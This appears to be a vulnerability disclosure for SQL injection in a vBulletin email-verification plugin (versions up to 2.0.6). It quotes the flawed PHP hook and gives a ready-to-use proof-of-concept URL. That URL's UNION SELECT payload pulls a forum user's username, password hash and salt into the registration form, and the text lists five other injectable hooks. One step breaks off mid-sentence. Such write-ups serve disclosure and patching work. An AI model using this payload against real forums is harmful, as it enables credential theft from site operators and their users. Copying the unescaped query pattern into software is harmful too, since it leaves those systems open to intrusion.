vBulletin Verify Email Before Registration Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
Version: <= 2.0.6, patched in >= 2.0.7 (latest)

The vulnerability resides in the register_form_complete hook (and in several other hooks of the plugin, listed at the end).
First few lines of the register_form_complete hook, as shipped in the vulnerable versions:

if($so == 1){
	if($emailcode){
		// $emailcode comes straight from the request and is interpolated
		// into the SQL string without escaping: this is the injection point.
		$emailfromcode = $db->query_write("SELECT * FROM " . TABLE_PREFIX . "userregcode WHERE userregcode ='$emailcode';");

		if($db->num_rows($emailfromcode)){
			// Second column of whatever row the query returns becomes the
			// confirmed e-mail address, so an injected UNION row is echoed back here.
			$emailfetched = $db->fetch_row($emailfromcode);
			$email = $emailconfirm = $emailfetched[1];
			$emailconfirmationcode = $emailcode;
		}else{
			eval(standard_error(fetch_error('thisemailhasbeenconfirmed')));
		}
	}
}
else{
	$code = md5(time()*rand());
}

User input is not sanitised before being used in queries: the $emailcode request parameter is concatenated directly into the WHERE clause, so a single quote closes the string literal and everything after it is executed as SQL. The same pattern is exploitable in each of the hooks listed below; this write-up uses register_form_complete.

Proof of concept (shown URL-decoded for readability; the number of columns in the UNION SELECT must match the column count of the userregcode table, and concat(username,0x3a,password,0x3a,salt) returns username:password:salt for the selected user, which the hook then places in the e-mail field):
http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM user WHERE userid = '1

Now look at the source of the page and find:


Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)
